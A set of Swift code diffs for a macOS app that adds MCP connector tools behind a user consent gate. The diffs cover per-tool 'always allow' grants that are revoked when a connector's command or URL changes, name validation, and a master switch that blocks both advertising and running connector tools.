--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
@@ -42,6 +42,12 @@ final class MCPConfigStore {
         }
     }
 
+    /// Invoked with a server's name when that server's execution identity
+    /// changes — a command/URL/args/env edit, a rename, or a removal. Wired to
+    /// ``MCPToolApprovalStore/revokeGrants(forServer:)`` so a remembered
+    /// "always allow" can't silently transfer to code the user did not approve.
+    var onServerReconfigured: ((String) -> Void)?
+
     init(defaults: UserDefaults = .standard, fileURL: URL? = nil) {
         self.defaults = defaults
         self.fileURL = fileURL ?? Self.defaultFileURL
@@ -169,8 +175,16 @@ final class MCPConfigStore {
         if servers.contains(where: { $0.name == server.name && $0.name != originalName }) {
             throw SaveError.duplicateName(server.name)
         }
+        // Consent invalidation. If an edit changes what code this connector
+        // runs — a new command/URL/args/env, or a rename — any "always allow"
+        // remembered against the old name must be dropped, or it would silently
+        // authorize the replacement. Enable/timeout edits don't change the code
+        // and keep their grants.
         var next = servers
         if let originalName, let idx = next.firstIndex(where: { $0.name == originalName }) {
+            if next[idx].runsDifferentCode(from: server) || originalName != server.name {
+                onServerReconfigured?(originalName)
+            }
             next[idx] = server
         } else {
             next.append(server)
@@ -179,6 +193,9 @@ final class MCPConfigStore {
     }
 
     func remove(named name: String) throws {
+        // A removed server's grants are dead keys; drop them so re-adding the
+        // same name later starts from a clean, unapproved slate.
+        onServerReconfigured?(name)
         try persist(servers.filter { $0.name != name })
     }
 

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
@@ -90,6 +90,22 @@ final class MCPConfigStore {
         } catch {
             servers = []
             loadError = "Couldn't read \(fileURL.path): \(error.localizedDescription)"
+            return
+        }
+        // Validation is enforced on the write path (``upsert``), but an
+        // imported config — the whole point of the ecosystem-standard shape —
+        // never went through it. The engine accepts any dictionary key as a
+        // name, so an illegal one is forwarded verbatim, becomes `bad name__tool`,
+        // and the model silently can't call it. Surface it here instead of
+        // letting it fail invisibly downstream.
+        let invalid = servers.filter { !MCPServerConfig.isValidName($0.name) }
+        if !invalid.isEmpty {
+            let names = invalid.map { "“\($0.name)”" }.joined(separator: ", ")
+            loadError =
+                "\(invalid.count == 1 ? "Connector" : "Connectors") \(names) "
+                + "\(invalid.count == 1 ? "has" : "have") an invalid name — use up to "
+                + "\(MCPServerConfig.maxNameLength) letters, numbers, dashes or "
+                + "underscores. Its tools won't be callable until renamed."
         }
     }
 
@@ -193,6 +209,13 @@ final class MCPConfigStore {
             // `.atomic` writes via a temp file and renames, which does NOT
             // carry permissions across — set them after the rename, every
             // time, or the mode silently reverts to the default umask.
+            //
+            // There is a brief window between the rename and this chmod where
+            // the file carries the umask default (typically 0644). It is not
+            // reachable: `.atomic`'s temp file is created inside `dir`, and
+            // `dir` is 0700, so no other account can traverse into it to read
+            // the file during that window regardless of the file's own mode.
+            // The 0600 is defence in depth on top of the 0700 directory.
             try FileManager.default.setAttributes(
                 [.posixPermissions: 0o600],
                 ofItemAtPath: fileURL.path

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
@@ -91,6 +91,25 @@ struct MCPServerConfig: Codable, Equatable, Hashable, Sendable, Identifiable {
         return true
     }
 
+    /// A stable string of this connector's execution identity — transport,
+    /// command, arguments, environment, URL. Two configs with the same
+    /// fingerprint run the same code; a change means consent must be
+    /// re-established. Used to catch hand-edits to the config file, which never
+    /// pass through the in-app edit path. Not cryptographic — only needs to
+    /// change when the execution identity does.
+    var executionFingerprint: String {
+        let envPart = env.sorted { $0.key < $1.key }
+            .map { "\($0.key)=\($0.value)" }
+            .joined(separator: ",")
+        return [
+            transport.rawValue,
+            command ?? "",
+            args.joined(separator: "\u{1}"),
+            envPart,
+            url ?? "",
+        ].joined(separator: "\u{2}")
+    }
+
     /// True when `other` would launch or reach a different program than `self`
     /// — a changed transport, command, arguments, environment, or URL.
     ///

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
@@ -1,0 +1,161 @@
+import Foundation
+
+/// One MCP server entry, as it round-trips through `~/.config/rapid-mlx/mcp.json`.
+///
+/// Mirrors the engine's `MCPServerConfig` (`vllm_mlx/mcp/types.py`) field for
+/// field. The engine is the one that actually spawns these processes and
+/// validates them (`vllm_mlx/mcp/security.py`); this type exists so the app can
+/// author the file the engine reads, and so the editor sheet has something
+/// typed to bind to.
+struct MCPServerConfig: Codable, Equatable, Hashable, Sendable, Identifiable {
+    enum Transport: String, Codable, CaseIterable, Sendable {
+        case stdio
+        case sse
+
+        var displayName: String {
+            switch self {
+            case .stdio: return "Command (stdio)"
+            case .sse:   return "URL (SSE)"
+            }
+        }
+    }
+
+    /// The map key in `mcpServers`. Also the namespace half of every tool name
+    /// this server exposes — see ``Self/isValidName(_:)``.
+    var name: String
+    var transport: Transport
+    /// stdio only. Must be on the engine's command allowlist
+    /// (`security.py: ALLOWED_COMMANDS`) or the engine rejects the entry.
+    var command: String?
+    var args: [String]
+    var env: [String: String]
+    /// SSE only.
+    var url: String?
+    var enabled: Bool
+    var timeout: Double
+
+    var id: String { name }
+
+    init(
+        name: String,
+        transport: Transport = .stdio,
+        command: String? = nil,
+        args: [String] = [],
+        env: [String: String] = [:],
+        url: String? = nil,
+        enabled: Bool = true,
+        timeout: Double = 30
+    ) {
+        self.name = name
+        self.transport = transport
+        self.command = command
+        self.args = args
+        self.env = env
+        self.url = url
+        self.enabled = enabled
+        self.timeout = timeout
+    }
+
+    // MARK: - Validation
+
+    /// Longest server name we accept.
+    ///
+    /// The engine namespaces every tool as `server__tool`
+    /// (`vllm_mlx/mcp/types.py: MCPTool.full_name`), and that composite string
+    /// travels as an OpenAI function name — which the spec caps at 64
+    /// characters from `[a-zA-Z0-9_-]`. Capping the server half at 32 leaves
+    /// room for a realistic tool name plus the two-underscore separator, and
+    /// rejecting here means the user finds out in the editor sheet rather than
+    /// through a model that mysteriously never calls one server's tools.
+    static let maxNameLength = 32
+
+    /// True when `name` can safely form the namespace half of a tool name.
+    ///
+    /// Deliberately stricter than the engine, which accepts any dictionary
+    /// key: a server called `my server` produces `my server__read_file`, and
+    /// a space is not a legal OpenAI function-name character.
+    static func isValidName(_ name: String) -> Bool {
+        guard !name.isEmpty, name.count <= maxNameLength else { return false }
+        for ch in name.unicodeScalars {
+            let ok = (ch >= "a" && ch <= "z")
+                || (ch >= "A" && ch <= "Z")
+                || (ch >= "0" && ch <= "9")
+                || ch == "_" || ch == "-"
+            if !ok { return false }
+        }
+        return true
+    }
+
+    /// Human-readable reason this entry can't be saved, or `nil` when it can.
+    /// Drives the editor sheet's inline error and its disabled Save button.
+    var validationError: String? {
+        if name.isEmpty {
+            return "Give this connector a name."
+        }
+        if !Self.isValidName(name) {
+            return "Use up to \(Self.maxNameLength) letters, numbers, dashes or underscores — the name becomes part of every tool name."
+        }
+        switch transport {
+        case .stdio:
+            if (command ?? "").trimmingCharacters(in: .whitespaces).isEmpty {
+                return "A command connector needs a command to run."
+            }
+        case .sse:
+            let raw = (url ?? "").trimmingCharacters(in: .whitespaces)
+            if raw.isEmpty {
+                return "A URL connector needs a URL."
+            }
+            guard let parsed = URL(string: raw), let scheme = parsed.scheme?.lowercased(),
+                  scheme == "http" || scheme == "https" else {
+                return "Enter an http:// or https:// URL."
+            }
+        }
+        if timeout <= 0 {
+            return "Timeout must be greater than zero."
+        }
+        return nil
+    }
+
+    // MARK: - Wire shape
+
+    /// The engine's JSON keys. `name` is the map key, not a field, so it is
+    /// excluded — ``MCPConfigStore`` reattaches it on load.
+    private enum CodingKeys: String, CodingKey {
+        case transport, command, args, env, url, enabled, timeout
+    }
+
+    init(from decoder: Decoder) throws {
+        let c = try decoder.container(keyedBy: CodingKeys.self)
+        // A hand-written config (or one pasted from another tool) routinely
+        // omits `transport` and just gives a command. Default rather than
+        // fail: refusing to decode would drop the entry from the UI entirely,
+        // which is the "my connectors vanished" failure this feature exists to
+        // avoid.
+        self.transport = try c.decodeIfPresent(Transport.self, forKey: .transport) ?? .stdio
+        self.command = try c.decodeIfPresent(String.self, forKey: .command)
+        self.args = try c.decodeIfPresent([String].self, forKey: .args) ?? []
+        self.env = try c.decodeIfPresent([String: String].self, forKey: .env) ?? [:]
+        self.url = try c.decodeIfPresent(String.self, forKey: .url)
+        self.enabled = try c.decodeIfPresent(Bool.self, forKey: .enabled) ?? true
+        self.timeout = try c.decodeIfPresent(Double.self, forKey: .timeout) ?? 30
+        self.name = ""  // reattached by MCPConfigStore from the map key
+    }
+
+    func encode(to encoder: Encoder) throws {
+        var c = encoder.container(keyedBy: CodingKeys.self)
+        try c.encode(transport, forKey: .transport)
+        // Only write the fields this transport actually uses. A stdio entry
+        // carrying a stale `url` (left behind by a user who switched transport
+        // mid-edit) reads as ambiguous in a file the user may open by hand.
+        switch transport {
+        case .stdio:
+            try c.encodeIfPresent(command, forKey: .command)
+            if !args.isEmpty { try c.encode(args, forKey: .args) }
+            if !env.isEmpty { try c.encode(env, forKey: .env) }
+        case .sse:
+            try c.encodeIfPresent(url, forKey: .url)
+        }
+        try c.encode(enabled, forKey: .enabled)
+        try c.encode(timeout, forKey: .timeout)
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
@@ -86,6 +86,20 @@ struct MCPServerConfig: Codable, Equatable, Hashable, Sendable, Identifiable {
         return true
     }
 
+    /// True when `other` would launch or reach a different program than `self`
+    /// — a changed transport, command, arguments, environment, or URL.
+    ///
+    /// Deliberately ignores `name`, `enabled`, and `timeout`: those don't
+    /// change what code runs, so they don't invalidate a consent grant. Drives
+    /// ``MCPConfigStore``'s grant invalidation on edit.
+    func runsDifferentCode(from other: MCPServerConfig) -> Bool {
+        transport != other.transport
+            || command != other.command
+            || args != other.args
+            || env != other.env
+            || url != other.url
+    }
+
     /// Human-readable reason this entry can't be saved, or `nil` when it can.
     /// Drives the editor sheet's inline error and its disabled Save button.
     var validationError: String? {

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPServerConfig.swift
@@ -76,6 +76,11 @@ struct MCPServerConfig: Codable, Equatable, Hashable, Sendable, Identifiable {
     /// a space is not a legal OpenAI function-name character.
     static func isValidName(_ name: String) -> Bool {
         guard !name.isEmpty, name.count <= maxNameLength else { return false }
+        // `__` is the namespace separator: the engine builds `server__tool` and
+        // both sides split on the FIRST `__`. A name that contains one (e.g.
+        // `my__server`) would be parsed as server `my`, tool `server__…`, and
+        // never dispatch. A single `_` is fine.
+        if name.contains("__") { return false }
         for ch in name.unicodeScalars {
             let ok = (ch >= "a" && ch <= "z")
                 || (ch >= "A" && ch <= "Z")

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
@@ -106,6 +106,25 @@ final class MCPToolApprovalStore {
         grantedTools = []
     }
 
+    /// Revoke every remembered grant for a server's tools.
+    ///
+    /// A grant is keyed on the namespaced `server__tool` name, which is stable
+    /// across a *reconfiguration*: point the "fs" connector at a different
+    /// command and "always allow fs__read_file" would silently authorize the
+    /// new program. The connector's identity effectively changed, so its
+    /// grants must not carry over. ``MCPConfigStore`` calls this whenever a
+    /// server's command/URL/args/env changes, when it is renamed, or when it is
+    /// removed — the next call re-prompts.
+    func revokeGrants(forServer serverName: String) {
+        let prefix = "\(serverName)__"
+        let affected = grantedTools.filter { $0.hasPrefix(prefix) }
+        guard !affected.isEmpty else { return }
+        for name in affected {
+            defaults.removeObject(forKey: Self.grantKey(name))
+        }
+        grantedTools.subtract(affected)
+    }
+
     // MARK: - Gate
 
     /// Gate one tool call. Returns immediately when already approved,
@@ -122,9 +141,12 @@ final class MCPToolApprovalStore {
         if pendingRequest != nil { return .unavailable }
 
         let shortName = Self.shortToolName(toolName)
-        let preview = BrowseApprovalStore.displaySafe(
-            BrowseApprovalStore.previewLine(argumentsJSON, cap: 400)
-        )
+        // The FULL arguments, display-safe — not a capped preview. The sheet
+        // scrolls, so truncating here would only let content past the cutoff be
+        // approved unseen, which is exactly what the consent gate exists to
+        // prevent. Model output is token-bounded, so there is no unbounded-size
+        // concern to cap against.
+        let preview = BrowseApprovalStore.displaySafe(argumentsJSON)
 
         return await withTaskCancellationHandler {
             await withCheckedContinuation { (continuation: CheckedContinuation<Decision, Never>) in

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
@@ -1,0 +1,179 @@
+import Foundation
+import Observation
+
+/// Per-tool consent gate for MCP connector tools.
+///
+/// Issue #1716 states the principle: an MCP server is an arbitrary local
+/// process the model can invoke, so "should this model be allowed to call this
+/// tool" is a **user** decision and belongs in a UI, not in a JSON file.
+///
+/// The shape is deliberately ``BrowseApprovalStore``'s — same `Mode`, same
+/// `Decision` vocabulary (including the load-bearing `unavailable` vs `deny`
+/// distinction), same continuation/cancellation dance. Two approval prompts
+/// that behave subtly differently is a worse outcome than a little structural
+/// repetition, and the browse store's cancellation handling was already
+/// hard-won.
+///
+/// What's new here is that the grant is **remembered per tool**: "Always
+/// allow" on `time__get_current_time` must not silently also grant
+/// `shell__run`. `BrowseApprovalStore` can flip one global mode because it
+/// gates one tool; this gates an open-ended set.
+@MainActor
+@Observable
+final class MCPToolApprovalStore {
+    enum Mode: String {
+        case ask
+        /// Blanket auto-approve. Off by default and never set implicitly —
+        /// only the explicit Settings switch turns it on, so "Always allow"
+        /// on a single tool can't widen into everything.
+        case autoApproveAll
+    }
+
+    enum Decision: Equatable {
+        case allowOnce
+        /// Approve and remember for this tool specifically.
+        case alwaysAllowTool
+        /// The USER said no.
+        case deny
+        /// Nobody decided: the turn was cancelled, or a prompt was already up.
+        /// Reported as ``FailureDiagnosis.Kind.userDeclined``'s sibling case,
+        /// not as a decline — see ``BrowseApprovalStore/Decision/unavailable``.
+        case unavailable
+    }
+
+    struct PendingApproval: Equatable {
+        /// Namespaced tool name as the engine knows it (`server__tool`).
+        let toolName: String
+        /// The server half, shown on its own. "Run read_file?" is unanswerable
+        /// without knowing whose `read_file`.
+        let serverName: String
+        /// Short, display-safe tool name (the part after `server__`).
+        let shortName: String
+        /// Capped, display-safe preview of the arguments the model chose.
+        let argumentsPreview: String
+    }
+
+    static let modeKey = "rapid.mcp.approval.mode.v1"
+    /// Per-tool grant. Keyed on the namespaced name so two servers exposing a
+    /// tool of the same name are granted separately.
+    static func grantKey(_ toolName: String) -> String {
+        "rapid.mcp.approval.tool.\(toolName).v1"
+    }
+
+    private let defaults: UserDefaults
+
+    var mode: Mode {
+        didSet {
+            guard mode != oldValue else { return }
+            defaults.set(mode.rawValue, forKey: Self.modeKey)
+        }
+    }
+
+    private(set) var pendingRequest: PendingApproval?
+    private var pendingContinuation: CheckedContinuation<Decision, Never>?
+
+    /// Tools with a remembered "always allow". Mirrored in memory so the
+    /// Settings list can render (and revoke) them without scanning defaults.
+    private(set) var grantedTools: Set<String>
+
+    init(defaults: UserDefaults = .standard) {
+        self.defaults = defaults
+        self.mode = Mode(rawValue: defaults.string(forKey: Self.modeKey) ?? "") ?? .ask
+        var granted = Set<String>()
+        for (key, value) in defaults.dictionaryRepresentation() {
+            guard key.hasPrefix("rapid.mcp.approval.tool."),
+                  key.hasSuffix(".v1"),
+                  (value as? Bool) == true else { continue }
+            let name = String(key.dropFirst("rapid.mcp.approval.tool.".count).dropLast(".v1".count))
+            if !name.isEmpty { granted.insert(name) }
+        }
+        self.grantedTools = granted
+    }
+
+    // MARK: - Queries
+
+    func isGranted(_ toolName: String) -> Bool {
+        mode == .autoApproveAll || grantedTools.contains(toolName)
+    }
+
+    /// Forget every remembered grant. The blanket auto-approve mode is a
+    /// separate switch and is left alone — a user resetting individual grants
+    /// has not asked to change the global posture.
+    func resetGrants() {
+        for name in grantedTools {
+            defaults.removeObject(forKey: Self.grantKey(name))
+        }
+        grantedTools = []
+    }
+
+    // MARK: - Gate
+
+    /// Gate one tool call. Returns immediately when already approved,
+    /// otherwise suspends until the UI answers.
+    func requestApproval(
+        toolName: String,
+        serverName: String,
+        argumentsJSON: String
+    ) async -> Decision {
+        if isGranted(toolName) { return .allowOnce }
+        // Re-entrancy guard — tool execution is serial, so a second pending
+        // request means something is wrong; refuse rather than hang. NOT a
+        // decline: the user was never shown this call.
+        if pendingRequest != nil { return .unavailable }
+
+        let shortName = Self.shortToolName(toolName)
+        let preview = BrowseApprovalStore.displaySafe(
+            BrowseApprovalStore.previewLine(argumentsJSON, cap: 400)
+        )
+
+        return await withTaskCancellationHandler {
+            await withCheckedContinuation { (continuation: CheckedContinuation<Decision, Never>) in
+                // Cancellation can land between the re-entrancy check and
+                // here; re-check inside the body so we bail rather than
+                // install a sheet nobody can ever answer.
+                if Task.isCancelled {
+                    continuation.resume(returning: .unavailable)
+                    return
+                }
+                self.pendingContinuation = continuation
+                self.pendingRequest = PendingApproval(
+                    toolName: toolName,
+                    serverName: BrowseApprovalStore.displaySafe(serverName),
+                    shortName: BrowseApprovalStore.displaySafe(shortName),
+                    argumentsPreview: preview
+                )
+            }
+        } onCancel: { [weak self] in
+            Task { @MainActor [weak self] in
+                guard let self else { return }
+                if let cont = self.pendingContinuation {
+                    self.pendingContinuation = nil
+                    self.pendingRequest = nil
+                    cont.resume(returning: .unavailable)
+                }
+            }
+        }
+    }
+
+    /// Called by the SwiftUI dialog with the user's choice; resumes the tool.
+    func answer(_ decision: Decision) {
+        guard let pending = pendingRequest else { return }
+        if decision == .alwaysAllowTool {
+            defaults.set(true, forKey: Self.grantKey(pending.toolName))
+            grantedTools.insert(pending.toolName)
+        }
+        pendingRequest = nil
+        pendingContinuation?.resume(returning: decision)
+        pendingContinuation = nil
+    }
+
+    /// The tool half of an engine-namespaced `server__tool` name.
+    ///
+    /// Splits on the FIRST `__` — a tool whose own name contains a double
+    /// underscore keeps it, which is right: the server half is what the engine
+    /// prefixed, and it never contains one.
+    static func shortToolName(_ fullName: String) -> String {
+        guard let range = fullName.range(of: "__") else { return fullName }
+        return String(fullName[range.upperBound...])
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPToolApprovalStore.swift
@@ -60,6 +60,13 @@ final class MCPToolApprovalStore {
         "rapid.mcp.approval.tool.\(toolName).v1"
     }
 
+    /// Last-seen execution fingerprint for a server, so a change to what it
+    /// runs — including one made by hand-editing the config file — can be
+    /// detected at launch and its grants revoked.
+    static func fingerprintKey(_ serverName: String) -> String {
+        "rapid.mcp.approval.fingerprint.\(serverName).v1"
+    }
+
     private let defaults: UserDefaults
 
     var mode: Mode {
@@ -71,6 +78,11 @@ final class MCPToolApprovalStore {
 
     private(set) var pendingRequest: PendingApproval?
     private var pendingContinuation: CheckedContinuation<Decision, Never>?
+    /// Identity of the current pending request. A cancellation handler is
+    /// queued onto the main actor and can run after its request was already
+    /// answered and a NEW one installed; without matching on this token, the
+    /// late cancel would resume the wrong (second) request as `.unavailable`.
+    private var pendingToken = 0
 
     /// Tools with a remembered "always allow". Mirrored in memory so the
     /// Settings list can render (and revoke) them without scanning defaults.
@@ -125,6 +137,26 @@ final class MCPToolApprovalStore {
         grantedTools.subtract(affected)
     }
 
+    /// Reconcile remembered grants against the connectors' current execution
+    /// fingerprints, revoking any whose server now runs different code.
+    ///
+    /// The in-app editor already revokes on a change (``MCPConfigStore``), but
+    /// the config file is hand-editable — the ecosystem-standard shape is the
+    /// whole point — and a direct edit never passes through that path. Calling
+    /// this at launch closes the hand-edit gap: a command swapped in the file
+    /// while the app was closed drops the grant before the tool can run.
+    /// `fingerprints` maps server name → ``MCPServerConfig/executionFingerprint``.
+    func reconcileGrants(against fingerprints: [String: String]) {
+        for (serverName, fingerprint) in fingerprints {
+            let key = Self.fingerprintKey(serverName)
+            let stored = defaults.string(forKey: key)
+            if let stored, stored != fingerprint {
+                revokeGrants(forServer: serverName)
+            }
+            defaults.set(fingerprint, forKey: key)
+        }
+    }
+
     // MARK: - Gate
 
     /// Gate one tool call. Returns immediately when already approved,
@@ -140,6 +172,8 @@ final class MCPToolApprovalStore {
         // decline: the user was never shown this call.
         if pendingRequest != nil { return .unavailable }
 
+        let token = pendingToken &+ 1
+        pendingToken = token
         let shortName = Self.shortToolName(toolName)
         // The FULL arguments, display-safe — not a capped preview. The sheet
         // scrolls, so truncating here would only let content past the cutoff be
@@ -167,7 +201,7 @@ final class MCPToolApprovalStore {
             }
         } onCancel: { [weak self] in
             Task { @MainActor [weak self] in
-                guard let self else { return }
+                guard let self, self.pendingToken == token else { return }
                 if let cont = self.pendingContinuation {
                     self.pendingContinuation = nil
                     self.pendingRequest = nil

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPToolRegistry.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPToolRegistry.swift
@@ -67,9 +67,23 @@ final class MCPToolRegistry: ToolRegistry {
         !disabledTools.contains(toolName)
     }
 
-    /// Everything the catalog reports, minus what the user switched off.
+    /// The master switch, read from the same defaults ``MCPConfigStore`` writes
+    /// it to. The authoritative connectors-off gate lives HERE, not in the
+    /// catalog: turning the switch off clears the catalog, but the running
+    /// child still has its connectors loaded, so a later ``/healthz`` ready
+    /// transition (`ContentView`) can repopulate the catalog from that live
+    /// child. Gating advertise + dispatch on the switch means "connectors off"
+    /// holds even across that repopulation — the model is never handed a
+    /// connector tool the user turned off, whatever the catalog currently says.
+    private var connectorsEnabled: Bool {
+        defaults.bool(forKey: MCPConfigStore.enabledKey)
+    }
+
+    /// Everything the catalog reports, minus what the user switched off — and
+    /// nothing at all while the master switch is off.
     var definitions: [ToolDefinition] {
-        catalog.tools.filter { !disabledTools.contains($0.function.name) }
+        guard connectorsEnabled else { return [] }
+        return catalog.tools.filter { !disabledTools.contains($0.function.name) }
     }
 
     /// Tools the catalog knows about regardless of the user's switches — the
@@ -79,6 +93,18 @@ final class MCPToolRegistry: ToolRegistry {
 
     func run(_ call: ToolCall) async -> ToolCallResult {
         let name = call.function.name
+
+        // Master switch. The child may still have connectors loaded (they
+        // unload on restart), so refuse execution here rather than trust that
+        // the catalog was cleared — same reasoning as ``definitions``.
+        guard connectorsEnabled else {
+            return ToolCallResult(
+                toolCallID: call.id,
+                content: "Connectors are turned off in Settings → Connectors; '\(name)' was not run.",
+                isError: true,
+                failureKind: .userDeclined
+            )
+        }
 
         // Defence in depth. ``ChatViewModel`` already refuses anything not
         // advertised this round, but this registry is reachable from any

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPToolRegistry.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPToolRegistry.swift
@@ -1,0 +1,144 @@
+import Foundation
+import Observation
+
+/// ``ToolRegistry`` over the MCP tools the engine has connected.
+///
+/// Issue #1716. The engine never injects MCP tools into `/v1/chat/completions`
+/// on its own (`MCPClientManager.get_merged_tools` exists but nothing calls
+/// it), so the tool loop stays entirely on this side — which is what lets the
+/// consent gate live in the UI where it belongs. The flow per call is:
+///
+///   model emits `server__tool`
+///     → ``ChatViewModel`` refuses it unless it was advertised this round
+///     → ``run(_:)`` → ``MCPToolApprovalStore`` (user says yes)
+///     → `POST /v1/mcp/execute` → result back to the model
+///
+/// Two independent gates precede execution and both are load-bearing: a tool
+/// the user switched off is never advertised AND is refused at dispatch, and a
+/// tool that was never approved does not run even if it was advertised.
+@MainActor
+@Observable
+final class MCPToolRegistry: ToolRegistry {
+    let catalog: MCPCatalog
+    let approval: MCPToolApprovalStore
+
+    /// Per-tool off switches from the Connectors panel, keyed by namespaced
+    /// tool name. Kept here rather than in ``ChatViewModel/disabledTools``
+    /// because these names come and go with the connected servers, while that
+    /// set is seeded once from a fixed built-in list.
+    private static func enabledKey(_ toolName: String) -> String {
+        "rapid.mcp.tool.enabled.\(toolName).v1"
+    }
+
+    private let defaults: UserDefaults
+    private(set) var disabledTools: Set<String>
+
+    init(
+        catalog: MCPCatalog,
+        approval: MCPToolApprovalStore,
+        defaults: UserDefaults = .standard
+    ) {
+        self.catalog = catalog
+        self.approval = approval
+        self.defaults = defaults
+        var disabled = Set<String>()
+        for (key, value) in defaults.dictionaryRepresentation() {
+            guard key.hasPrefix("rapid.mcp.tool.enabled."),
+                  key.hasSuffix(".v1"),
+                  (value as? Bool) == false else { continue }
+            let name = String(
+                key.dropFirst("rapid.mcp.tool.enabled.".count).dropLast(".v1".count)
+            )
+            if !name.isEmpty { disabled.insert(name) }
+        }
+        self.disabledTools = disabled
+    }
+
+    func setToolEnabled(_ toolName: String, _ enabled: Bool) {
+        defaults.set(enabled, forKey: Self.enabledKey(toolName))
+        if enabled {
+            disabledTools.remove(toolName)
+        } else {
+            disabledTools.insert(toolName)
+        }
+    }
+
+    func isToolEnabled(_ toolName: String) -> Bool {
+        !disabledTools.contains(toolName)
+    }
+
+    /// Everything the catalog reports, minus what the user switched off.
+    var definitions: [ToolDefinition] {
+        catalog.tools.filter { !disabledTools.contains($0.function.name) }
+    }
+
+    /// Tools the catalog knows about regardless of the user's switches — the
+    /// Settings list needs the off ones too, or a disabled tool would vanish
+    /// and leave no way to re-enable it.
+    var allKnownTools: [ToolDefinition] { catalog.tools }
+
+    func run(_ call: ToolCall) async -> ToolCallResult {
+        let name = call.function.name
+
+        // Defence in depth. ``ChatViewModel`` already refuses anything not
+        // advertised this round, but this registry is reachable from any
+        // future caller and a disabled connector tool must never execute.
+        guard !disabledTools.contains(name) else {
+            return ToolCallResult(
+                toolCallID: call.id,
+                content: "tool '\(name)' is turned off in Settings → Connectors and was not run.",
+                isError: true,
+                failureKind: .userDeclined
+            )
+        }
+
+        let server = catalog.serverForTool[name] ?? "unknown"
+
+        switch await approval.requestApproval(
+            toolName: name,
+            serverName: server,
+            argumentsJSON: call.function.arguments
+        ) {
+        case .allowOnce, .alwaysAllowTool:
+            break
+        case .deny:
+            return ToolCallResult(
+                toolCallID: call.id,
+                content: "The user declined to run '\(name)'. Continue without it.",
+                isError: true,
+                failureKind: .userDeclined
+            )
+        case .unavailable:
+            return ToolCallResult(
+                toolCallID: call.id,
+                content: "'\(name)' was not run — the request was cancelled before it could be approved.",
+                isError: true,
+                failureKind: .userDeclined
+            )
+        }
+
+        do {
+            let response = try await catalog.execute(
+                toolName: name,
+                argumentsJSON: call.function.arguments
+            )
+            let text = response.text
+            return ToolCallResult(
+                toolCallID: call.id,
+                // An empty body from a successful call is not an error, but
+                // handing the model "" invites it to invent the answer. Say
+                // plainly that the tool returned nothing.
+                content: text.isEmpty && !response.is_error
+                    ? "(the tool returned no content)"
+                    : text,
+                isError: response.is_error
+            )
+        } catch {
+            return ToolCallResult(
+                toolCallID: call.id,
+                content: "'\(name)' could not run — \(error.localizedDescription).",
+                isError: true
+            )
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/RapidApp.swift
+++ b/apps/rapid-mac/Sources/Rapid/RapidApp.swift
@@ -60,6 +60,13 @@ struct RapidApp: App {
     /// Per-fetch approval gate for the ``browse`` tool, shared by the tool
     /// runner (which suspends on it) and the SwiftUI approval sheet.
     @State private var browseApproval: BrowseApprovalStore
+    /// MCP connectors (issue #1716) — the config file the engine reads, the
+    /// live state it reports back, the per-tool consent gate, and the registry
+    /// that ties them into the chat loop.
+    @State private var mcpConfig: MCPConfigStore
+    @State private var mcpCatalog: MCPCatalog
+    @State private var mcpApproval: MCPToolApprovalStore
+    @State private var mcpTools: MCPToolRegistry
 
     /// AppKit delegate — installs the menu-bar tray + tears down the
     /// subprocess before the process image dies.
@@ -110,12 +117,40 @@ struct RapidApp: App {
         // so Settings + the approval sheet bind to the same instances.
         let webSearchConfig = WebSearchConfig()
         let browseApprovalStore = BrowseApprovalStore()
-        let toolRegistry = BuiltinToolRegistry(
+        let builtinRegistry = BuiltinToolRegistry(
             browseApproval: browseApprovalStore,
             webSearch: webSearchConfig
         )
         _webSearch = State(initialValue: webSearchConfig)
         _browseApproval = State(initialValue: browseApprovalStore)
+
+        // Issue #1716: MCP connectors. The config store owns the file the
+        // engine child reads; the catalog reads back what that child actually
+        // connected to; the approval store gates every call the model makes.
+        // All three are republished into the environment so Settings and the
+        // approval dialog bind to the same instances the tool runner consults.
+        let mcpConfigStore = MCPConfigStore()
+        let mcpApprovalStore = MCPToolApprovalStore()
+        let mcpCatalog = MCPCatalog { [weak manager] in
+            // Only report an endpoint once the child answered /healthz —
+            // polling a starting server just logs connection refusals, and a
+            // stopped one has no bearer to authenticate with.
+            guard let manager, manager.servingAlias != nil,
+                  let bearer = manager.activeBearer else { return nil }
+            return (host: manager.host, port: manager.activePort, bearer: bearer)
+        }
+        let mcpRegistry = MCPToolRegistry(catalog: mcpCatalog, approval: mcpApprovalStore)
+        let toolRegistry = CompositeToolRegistry(builtin: builtinRegistry, mcp: mcpRegistry)
+        // Resolved at each spawn rather than captured now — see
+        // ``ServerManager/mcpConfigPathProvider``.
+        manager.mcpConfigPathProvider = { [weak mcpConfigStore] in
+            MainActor.assumeIsolated { mcpConfigStore?.launchConfigPath }
+        }
+        _mcpConfig = State(initialValue: mcpConfigStore)
+        _mcpCatalog = State(initialValue: mcpCatalog)
+        _mcpApproval = State(initialValue: mcpApprovalStore)
+        _mcpTools = State(initialValue: mcpRegistry)
+
